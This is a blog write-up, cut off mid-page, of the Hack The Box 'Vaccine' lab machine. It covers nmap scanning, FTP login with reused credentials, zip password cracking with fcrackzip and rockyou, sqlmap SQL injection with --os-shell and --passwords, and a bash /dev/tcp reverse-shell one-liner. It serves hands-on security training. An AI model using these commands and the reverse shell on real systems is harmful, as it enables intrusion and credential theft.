<!DOCTYPE html>
<html ⚡>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <title>Vaccine Walkthrough | HTB</title>

    <meta name="description" content="After the Oopsie Walkthrough, here I&#x27;m with Vaccine box. Let&#x27;s hack and grab the flags" />
    <link rel="icon" href="../../favicon.ico" type="image/x-icon" />
    <link rel="canonical" href="../index.html" />
    <meta name="referrer" content="no-referrer-when-downgrade" />
    
    <meta property="og:site_name" content="h4rithd.com" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Vaccine Walkthrough | HTB" />
    <meta property="og:description" content="After the Oopsie Walkthrough, here I&#x27;m with Vaccine box. Let&#x27;s hack and grab the flags" />
    <meta property="og:url" content="https://h4rithd.com/blog/starting-point-htb-vaccine-walkthrough/" />
    <meta property="og:image" content="https://h4rithd.com/blog/content/images/2021/06/VaccineBG-.jpg" />
    <meta property="article:published_time" content="2021-04-30T16:26:00.000Z" />
    <meta property="article:modified_time" content="2021-06-02T06:00:06.000Z" />
    <meta property="article:tag" content="Starting Point Walkthrough" />
    <meta property="article:tag" content="Vaccine Walkthrough" />
    <meta property="article:tag" content="h4rithd" />
    <meta property="article:tag" content="Harith Dilshan" />
    
    <meta property="article:publisher" content="https://www.facebook.com/ShapManasick/" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="Vaccine Walkthrough | HTB" />
    <meta name="twitter:description" content="After the Oopsie Walkthrough, here I&#x27;m with Vaccine box. Let&#x27;s hack and grab the flags" />
    <meta name="twitter:url" content="https://h4rithd.com/blog/starting-point-htb-vaccine-walkthrough/" />
    <meta name="twitter:image" content="https://h4rithd.com/blog/content/images/2021/06/VaccineBG-.jpg" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="Harith Dilshan" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="Starting Point Walkthrough, Vaccine Walkthrough, h4rithd, Harith Dilshan" />
    <meta name="twitter:site" content="@h4rithd" />
    <meta name="twitter:creator" content="@h4rithd" />
    <meta property="og:image:width" content="1920" />
    <meta property="og:image:height" content="1035" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "h4rithd.com",
        "url": "https://h4rithd.com/blog/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2021/06/Logo.png",
            "width": 60,
            "height": 60
        }
    },
    "author": {
        "@type": "Person",
        "name": "Harith Dilshan",
        "image": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2021/06/ProfilePic.jpg",
            "width": 2000,
            "height": 2000
        },
        "url": "https://h4rithd.com/blog/author/h4rithd/",
        "sameAs": [
            "https://h4rithd.com/",
            "https://twitter.com/h4rithd"
        ]
    },
    "headline": "Vaccine Walkthrough | HTB",
    "url": "https://h4rithd.com/blog/starting-point-htb-vaccine-walkthrough/",
    "datePublished": "2021-04-30T16:26:00.000Z",
    "dateModified": "2021-06-02T06:00:06.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://h4rithd.com/blog/content/images/2021/06/VaccineBG-.jpg",
        "width": 1920,
        "height": 1035
    },
    "keywords": "Starting Point Walkthrough, Vaccine Walkthrough, h4rithd, Harith Dilshan",
    "description": "After the Oopsie Walkthrough, here I&#x27;m with Vaccine box. Let&#x27;s hack and grab the\nflags.\n\n\n--------------------------------------------------------------------------------\n\nAs I mentioned before, the starting point machines are a series of 9 machines\nrated as &quot;very easy&quot; and should be rooted in a sequence. So it means, if you\nneed to go through this box you must have a complete Oopsie\n[https://h4rithd.com/blog/starting-point-htb-oopsie-walkthrough/index.html]\nmachine.\n\nEnough talks, 🥱 Let’s Get ",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://h4rithd.com/blog/"
    }
}
    </script>

    <meta name="generator" content="Ghost 4.6" />
    <link rel="alternate" type="application/rss+xml" title="h4rithd.com" href="../../rss/index.html" />

    <style amp-custom>
    *,
    *::before,
    *::after {
        box-sizing: border-box;
    }

    html {
        overflow-x: hidden;
        overflow-y: scroll;
        font-size: 62.5%;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    }

    body {
        min-height: 100vh;
        margin: 0;
        padding: 0;
        color: #3a4145;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.7rem;
        line-height: 1.55em;
        font-weight: 400;
        font-style: normal;
        background: #fff;
        scroll-behavior: smooth;
        overflow-x: hidden;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
    }

    p,
    ul,
    ol,
    li,
    dl,
    dd,
    hr,
    pre,
    form,
    table,
    video,
    figure,
    figcaption,
    blockquote {
        margin: 0;
        padding: 0;
    }

    ul[class],
    ol[class] {
        padding: 0;
        list-style: none;
    }

    img {
        display: block;
        max-width: 100%;
    }

    input,
    button,
    select,
    textarea {
        font: inherit;
        -webkit-appearance: none;
    }

    fieldset {
        margin: 0;
        padding: 0;
        border: 0;
    }

    label {
        display: block;
        font-size: 0.9em;
        font-weight: 700;
    }

    hr {
        position: relative;
        display: block;
        width: 100%;
        height: 1px;
        border: 0;
        border-top: 1px solid currentcolor;
        opacity: 0.1;
    }

    ::selection {
        text-shadow: none;
        background: #cbeafb;
    }

    mark {
        background-color: #fdffb6;
    }

    small {
        font-size: 80%;
    }

    sub,
    sup {
        position: relative;
        font-size: 75%;
        line-height: 0;
        vertical-align: baseline;
    }
    sup {
        top: -0.5em;
    }
    sub {
        bottom: -0.25em;
    }

    ul li + li {
        margin-top: 0.6em;
    }

    a {
        color: var(--ghost-accent-color, #1292EE);
        text-decoration-skip-ink: auto;
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
        margin: 0;
        font-weight: 700;
        color: #121212;
        line-height: 1.4em;
    }

    h1 {
        font-size: 3.4rem;
        line-height: 1.1em;
    }

    h2 {
        font-size: 2.4rem;
        line-height: 1.2em;
    }

    h3 {
        font-size: 1.8rem;
    }

    h4 {
        font-size: 1.7rem;
    }

    h5 {
        font-size: 1.6rem;
    }

    h6 {
        font-size: 1.6rem;
    }

    amp-img {
        height: 100%;
        width: 100%;
        max-width: 100%;
        max-height: 100%;
    }

    amp-img img {
        object-fit: cover;
    }

    .page-header {
        padding: 50px 5vmin 30px;
        text-align: center;
        font-size: 2rem;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .page-header a {
        color: #121212;
        font-weight: 700;
        text-decoration: none;
        font-size: 1.6rem;
        letter-spacing: -0.1px;
    }

    .post {
        max-width: 680px;
        margin: 0 auto;
    }

    .post-header {
        margin: 0 5vmin 5vmin;
        text-align: center;
    }

    .post-meta {
        margin: 1rem 0 0 0;
        text-transform: uppercase;
        color: #738a94;
        font-weight: 500;
        font-size: 1.3rem;
    }

    .post-image {
        margin: 0 0 5vmin;
    }

    .post-image img {
        display: block;
        width: 100%;
        height: auto;
    }

    .post-content {
        padding: 0 5vmin;
    }

    .post-content > * + * {
        margin-top: 1.5em;
    }

    .post-content [id]:not(:first-child) {
        margin: 2em 0 0;
    }

    .post-content > [id] + * {
        margin-top: 1rem;
    }

    .post-content [id] + .kg-card,
    .post-content blockquote + .kg-card {
        margin-top: 40px;
    }

    .post-content > ul,
    .post-content > ol,
    .post-content > dl {
        padding-left: 1.9em;
    }

    .post-content hr {
        margin-top: 40px;
    }

    .post .post-content hr + * {
        margin-top: 40px;
    }

    .post-content amp-img {
        background-color: #f8f8f8;
    }

    .post-content blockquote {
        position: relative;
        font-style: italic;
    }

    .post-content blockquote::before {
        content: "";
        position: absolute;
        left: -1.5em;
        top: 0;
        bottom: 0;
        width: 0.3rem;
        background: var(--ghost-accent-color, #1292EE);
    }

    .post-content :not(.kg-card):not([id]) + .kg-card {
        margin-top: 40px;
    }

    .post-content .kg-card + :not(.kg-card) {
        margin-top: 40px;
    }

    .kg-card figcaption {
        padding: 1.5rem 1.5rem 0;
        text-align: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.4em;
        opacity: 0.6;
    }

    .kg-card figcaption strong {
        color: rgba(0,0,0,0.8);
    }

    .post-content :not(pre) code {
        vertical-align: middle;
        padding: 0.15em 0.4em 0.15em;
        border: #e1eaef 1px solid;
        font-weight: 400;
        font-size: 0.9em;
        line-height: 1em;
        color: #15171a;
        background: #f0f6f9;
        border-radius: 0.25em;
    }

    .post-content > pre {
        overflow: scroll;
        padding: 16px 20px;
        color: #fff;
        background: #1F2428;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0,0,0,.1), 0 0 1px rgba(0,0,0,.4);
    }

    .kg-embed-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        width: 100%;
    }

    .kg-image-card img {
        margin: auto;
    }

    .kg-gallery-card + .kg-gallery-card {
        margin-top: 0.75em;
    }

    .kg-gallery-container {
        position: relative;
    }

    .kg-gallery-row {
        display: flex;
        flex-direction: row;
        justify-content: center;
    }

    .kg-gallery-image {
        width: 100%;
        height: 100%;
    }

    .kg-gallery-row:not(:first-of-type) {
        margin: 0.75em 0 0 0;
    }

    .kg-gallery-image:not(:first-of-type) {
        margin: 0 0 0 0.75em;
    }

    .kg-bookmark-card,
    .kg-bookmark-publisher {
        position: relative;
    }

    .kg-bookmark-container,
    .kg-bookmark-container:hover {
        display: flex;
        flex-wrap: wrap;
        flex-direction: row-reverse;
        color: currentColor;
        background: rgba(255,255,255,0.6);
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        text-decoration: none;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0, 0, 0, 0.1), 0 0 1px rgba(0, 0, 0, 0.4);
        overflow: hidden;
    }

    .kg-bookmark-content {
        flex-basis: 0;
        flex-grow: 999;
        padding: 20px;
        order: 1;
    }

    .kg-bookmark-title {
        font-weight: 600;
        font-size: 1.5rem;
        line-height: 1.3em;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        max-height: 45px;
        margin: 0.5em 0 0 0;
        font-size: 1.4rem;
        line-height: 1.55em;
        overflow: hidden;
        opacity: 0.8;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
    }

    .kg-bookmark-metadata {
        margin-top: 20px;
    }

    .kg-bookmark-metadata {
        display: flex;
        align-items: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.3em;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        -webkit-box-orient: vertical;
        -webkit-line-clamp: 2;
        overflow: hidden;
    }

    .kg-bookmark-metadata amp-img {
        width: 18px;
        height: 18px;
        max-width: 18px;
        max-height: 18px;
        margin-right: 10px;
    }

    .kg-bookmark-thumbnail {
        display: flex;
        flex-basis: 20rem;
        flex-grow: 1;
        justify-content: flex-end;
    }

    .kg-bookmark-thumbnail amp-img {
        max-height: 200px;
    }

    .kg-bookmark-author {
        white-space: nowrap;
        text-overflow: ellipsis;
        overflow: hidden;
    }

    .kg-bookmark-publisher::before {
        content: "•";
        margin: 0 .5em;
    }

    .kg-width-full.kg-card-hascaption {
        display: grid;
        grid-template-columns: inherit;
    }

    .post-content table {
        border-collapse: collapse;
        width: 100%;
    }

    .post-content th {
        padding: 0.5em 0.8em;
        text-align: left;
        font-size: .75em;
        text-transform: uppercase;
    }

    .post-content td {
        padding: 0.4em 0.7em;
    }

    .post-content tbody tr:nth-child(2n + 1) {
        background-color: rgba(0,0,0,0.1);
        padding: 1px;
    }

    .post-content tbody tr:nth-child(2n + 2) td:last-child {
        box-shadow:
            inset 1px 0 rgba(0,0,0,0.1),
            inset -1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:nth-child(2n + 2) td {
        box-shadow: inset 1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:last-child {
        border-bottom: 1px solid rgba(0,0,0,.1);
    }

    .page-footer {
        padding: 60px 5vmin;
        margin: 60px auto 0;
        text-align: center;
        background-color: #f8f8f8;
    }

    .page-footer h3 {
        margin: 0.5rem 0 0 0;
    }

    .page-footer p {
        max-width: 500px;
        margin: 1rem auto 1.5rem;
        font-size: 1.7rem;
        line-height: 1.5em;
        color: rgba(0,0,0,0.6)
    }

    .powered {
        display: inline-flex;
        align-items: center;
        margin: 30px 0 0;
        padding: 6px 9px 6px 6px;
        border: rgba(0,0,0,0.1) 1px solid;
        font-size: 12px;
        line-height: 12px;
        letter-spacing: -0.2px;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-weight: 500;
        color: #222;
        text-decoration: none;
        background: #fff;
        border-radius: 6px;
    }

    .powered svg {
        height: 16px;
        width: 16px;
        margin: 0 6px 0 0;
    }

    @media (max-width: 600px) {
        body {
            font-size: 1.6rem;
        }
        h1 {
            font-size: 3rem;
        }

        h2 {
            font-size: 2.2rem;
        }
    }

    @media (max-width: 400px) {
        h1 {
            font-size: 2.6rem;
            line-height: 1.15em;
        }
        h2 {
            font-size: 2rem;
            line-height: 1.2em;
        }
        h3 {
            font-size: 1.7rem;
        }
    }

    :root {--ghost-accent-color: #0065a3;}
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    

</head>

<body class="amp-template">
    <header class="page-header">
        <a href="../../index.html">
                <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed"></amp-img>
        </a>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">Vaccine Walkthrough</h1>
                <section class="post-meta">
                    Harith Dilshan -
                    <time class="post-date" datetime="2021-04-30">30 Apr 2021</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="https://h4rithd.com/blog/content/images/2021/06/VaccineBG-.jpg" width="600" height="340" layout="responsive"></amp-img>
            </figure>
            <section class="post-content">

                <p>After the Oopsie Walkthrough, here I'm with Vaccine box. Let's hack and grab the flags.</p><hr></hr><p>As I mentioned before, the starting point machines are a series of 9 machines rated as "<strong>very easy</strong>" and should be <strong>rooted in a sequence</strong>. So it means, if you need to go through this box you must have a complete <a href="https://h4rithd.com/blog/starting-point-htb-oopsie-walkthrough/index.html">Oopsie </a>machine.</p><p>Enough talks, 🥱 Let’s Get It Started 🐱‍💻</p><blockquote><strong><em>Disclaimers: </em></strong><em>No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤</em></blockquote>
<div class="elfsight-app-a4de7430-6c0c-44b8-aada-9b9ac759e396"></div>
<hr></hr><h2 id="00-start-machine-%E2%80%A6"><strong>00. Start Machine …</strong></h2><p>To start the machine, just click on "<strong>Join Machine</strong>".</p><figure class="kg-card kg-image-card"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-Ma6ZVXn8HPjGO1_C7O5%2F-Ma6adhLsdnklUuCDOrb%2Fimage.png?alt=media&amp;token=8795bc47-aceb-4af0-96df-b1cb16d543b6" class="kg-image" alt="Start Vaccine Machine Enter a caption for this image (optional)" width="1636" height="737" layout="responsive"></amp-img></figure><p>Then you can see the <strong>IP </strong>address for that machine. <strong>🤠</strong></p><figure class="kg-card kg-image-card"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-Ma6bHFGGA_BKPvfND0L%2F-Ma6by2iwjjKwjRrXySq%2Fimage.png?alt=media&amp;token=057943cd-b56e-4b03-bdb5-9f57f3ce2ade" class="kg-image" alt="10.10.10.46Enter a caption for this image (optional)" width="447" height="505" layout="responsive"></amp-img></figure><p>Before going to enumeration steps we can simply ping to the IP address and check whether  the VPN is connected and the machine is alive. Sometimes the machines might "Disable" ping requests when passing through the firewall. But in most cases ping will be a success! 🙂</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-96.png" class="kg-image" alt width="1492" height="554" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-96.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-96.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-96.png 1492w" layout="responsive"></amp-img></figure><p>As a ping result, it's <code>TTL=63</code>. There is only one route between machine and us (VPN). So definitely it will be a <code>Linux</code> machine.</p><hr></hr><h2 id="01-enumeration-first-%E2%80%A6"><strong>01. Enumeration First …</strong></h2><h3 id="011-fast-ports-scan"><strong>01.1 Fast ports scan</strong></h3><p>As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.</p><pre><code class="language-bash">nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.46</code></pre><pre><code class="language-bash">-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network</code></pre><p>Here is the output 👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-97.png" class="kg-image" alt width="1000" height="605" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-97.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-97.png 1000w" layout="responsive"></amp-img></figure><p>Now we know which ports are open,</p><h3 id="%E2%80%8C012-run-nmap-scripting-engine"><strong>‌01.2 Run Nmap Scripting Engine</strong></h3><p>To get the best result we can run the <code>Nmap Scripting Engine</code> for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible.</p><pre><code class="language-bash">nmap -sV -sC -oN DetailPorts.nmap -p 21,22,80 -Pn 10.10.10.46</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-98.png" class="kg-image" alt width="1000" height="586" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-98.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-98.png 1000w" layout="responsive"></amp-img></figure><p>‌There are 3 main ports. Look at the SSH version info, the machine flavor is <a href="https://launchpad.net/ubuntu/+source/openssh/1:8.0p1-6build1" rel="noopener noreferrer"><code>Ubuntu Eoan</code></a>.  And also some website is running on port 80 and Nmap indicate it as <code>MegaCrop Login</code>. Let's look what is inside ftp first.</p><h3 id="013-discover-more-on-port-21"><strong>01.3 Discover more on port 21</strong></h3><p>Do you remember that we had some ftp credentials from our previous box(Oopsie)? So, let’s use them and check the login to ftp service.</p><ul><li>ftpuser : mc@F1l3ZilL4</li></ul><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-99.png" class="kg-image" alt width="1380" height="626" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-99.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-99.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-99.png 1380w" layout="responsive"></amp-img></figure><p>We successfully logged in to the ftp server as <code>ftpuser</code>. Again let's enumerate to find any other thing.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-100.png" class="kg-image" alt width="1000" height="235" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-100.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-100.png 1000w" layout="responsive"></amp-img></figure><p>There is a backup.zip file in this ftp server. Before we check what is inside that zip file, we are going to download it to our machine.</p><blockquote><em>we can use </em><code><em>get filename</em></code><em> command to download any file from ftp server. Click <a href="https://www.serv-u.com/linux-ftp-server/commands">here</a> if you need learn ftp basic commands. 😎😎</em></blockquote><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-101.png" class="kg-image" alt width="1000" height="257" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-101.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-101.png 1000w" layout="responsive"></amp-img></figure><p>We can use <code>unzip</code> for extract any basic zip file. Here we can see <code>index.php</code> file but the zip file is protected by some kind of password.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-102.png" class="kg-image" alt width="1272" height="370" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-102.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-102.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-102.png 1272w" layout="responsive"></amp-img></figure><p>We can check passwords from previous machines but trust me nothing works. It means we need to crack that zip file and grab the password. There are so many tools to crack zip file password. But I prefer using  <a href="https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html" rel="noopener noreferrer"><code>fcrackzip</code></a></p><p>To install <code>fcrackzip</code>, type the following command and hit enter. 😁😁</p><pre><code class="language-bash"> apt-get install fcrackzip
</code></pre><p>If you are on your <strong>very first time to use</strong> rockyou word list, you need to extract it.</p><pre><code class="language-bash">gunzip /usr/share/wordlists/rockyou.txt.gz</code></pre><pre><code class="language-bash">fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip</code></pre><pre><code class="language-bash">-u	: Use unzip to weed out wrong passwords
-D	: Use a dictionary
-p	: Use string as initial password/file</code></pre><p>Here is the output 👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-103.png" class="kg-image" alt width="1414" height="370" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-103.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-103.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-103.png 1414w" layout="responsive"></amp-img></figure><p>As you can feel it's too fast than using <code>John the Ripper</code>, isn't it? Now we have password, so... let's unzip that archive to get <code>index.php</code> file.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-104.png" class="kg-image" alt width="1000" height="304" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-104.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-104.png 1000w" layout="responsive"></amp-img></figure><p>Oh! there is a css file also. First of all, check <code>index.php</code> file..</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-105.png" class="kg-image" alt width="2156" height="662" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-105.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-105.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-105.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-105.png 2156w" layout="responsive"></amp-img></figure><p>By looking at the very first lines, we can see the credentials. But here, the password is in md5 hash format. Let's try to decode it using online <a href="https://crackstation.net/" rel="noopener noreferrer">crackstation </a>site.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-107.png" class="kg-image" alt width="1323" height="497" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-107.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-107.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-107.png 1323w" layout="responsive"></amp-img></figure><p><br />Oh! what a simple password. So now the credentials are,</p><ul><li><code>admin : qwerty789</code></li></ul><h3 id="014-discover-more-on-port-80"><strong>01.4 Discover more on port 80</strong></h3><p>Now let's jump to the port 80, Here we have <strong>MegaCrop Login</strong> page and now we have the credentials. Let's use it to login. What the hell, I think we could simply get that password if we brute forced that login page using <code>rockyou</code> password list. Isn't it? 🤦‍♂️</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-108.png" class="kg-image" alt width="1000" height="595" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-108.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-108.png 1000w" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-109.png" class="kg-image" alt width="1000" height="584" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-109.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-109.png 1000w" layout="responsive"></amp-img></figure><p>Finally, we have only one function on this site and it is <strong>search</strong> option. Let's fire up <code>Burp Suite</code> and check what are the requests going through.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-111.png" class="kg-image" alt width="1000" height="470" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-111.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-111.png 1000w" layout="responsive"></amp-img></figure><p>‌When looking at the request,  a lot of vulnerabilities came to my head but nothing worked except <code>SQL Injection</code>.</p><hr></hr><h2 id="02-foothold"><strong>02. Foothold</strong></h2><p>Let's jump to <code>sqlmap</code> . As you can see here, the request is a GET request. You can simply add <code>*</code> to your value of parameter (in this case it is search) which you want to scan. But keep in mind that we now have access to the system. It means, to use search function you must need a valid session token. So we are going to pass the  <strong>PHPSESSID </strong>as a cookie parameter.</p><pre><code class="language-bash">sqlmap http://10.10.10.46/dashboard.php?search=* --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --dbs --batch</code></pre><pre><code class="language-bash">--dbs	: get the database list
--batch	: Never ask for user input, use the default behavior</code></pre><blockquote><em>Click <a href="https://gist.github.com/jkullick/03b98b1e44f03986c5d1fc69c092220d">here</a> If you need SQLMap Cheat Sheet</em></blockquote><p>Here is the output 👇👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-112.png" class="kg-image" alt width="1325" height="667" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-112.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-112.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-112.png 1325w" layout="responsive"></amp-img></figure><p>When looking at the output we can see that there are 3 main databases. You can enumerate all the tables and fetch data from the databases.</p><h3 id="021-get-user-shell"><strong>02.1 Get User Shell</strong></h3><p>There are 2 main ways to get user shell in this box.</p><ul><li>Using SQLMap <code>--os-shell</code> command.</li><li>Enumerating all the tables.</li></ul><p>Here I will show the 1st step: We could use the SQLMap flag <code>--os-shell</code> to gain a shell and after that gain an upgraded reverse shell with the next commands. However I lost the connection sometimes with this method. Anyway first try it out. It's very simple, type bellow command on your terminal.</p><pre><code class="language-bash">sqlmap http://10.10.10.46/dashboard.php?search=* --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --os-shell --batch</code></pre><p>Then your shell will look like this 👇👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-113.png" class="kg-image" alt width="761" height="242" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-113.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-113.png 761w" layout="responsive"></amp-img></figure><p><br />Now, time to upgrade that ugly shell. 🎅🎅 Start netcat listener on whatever port you like (In this case it's 4848) and run below command on os-shell.👇</p><pre><code class="language-bash">bash -c 'bash -i &amp;&gt;/dev/tcp/&lt;YourIP&gt;/4848 &lt;&amp;1' &amp;</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-114.png" class="kg-image" alt width="1449" height="280" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-114.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-114.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-114.png 1449w" layout="responsive"></amp-img></figure><p>Let's check the 2nd step: Now we need to enumerate the database and to find users and the passwords. So let's get started.</p><p>Without enumerate the table one by one we can use a simple command to find the passwords on the database using <code>--password</code> flag.👴👴 Pretty cool right? 🤩</p><pre><code class="language-bash">sqlmap http://10.10.10.46/dashboard.php?search=* --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --batch --passwords
</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-115.png" class="kg-image" alt width="969" height="391" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-115.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-115.png 969w" layout="responsive"></amp-img></figure><p><br />So we found one user <code>postgres</code> and the password from md5 hash format. I tried to crack this hash with john and hashcat, however a quick google search could save some time.(Remove the 'md5' part beginning.)</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-116.png" class="kg-image" alt width="1235" height="643" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-116.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-116.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-116.png 1235w" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-117.png" class="kg-image" alt width="881" height="347" 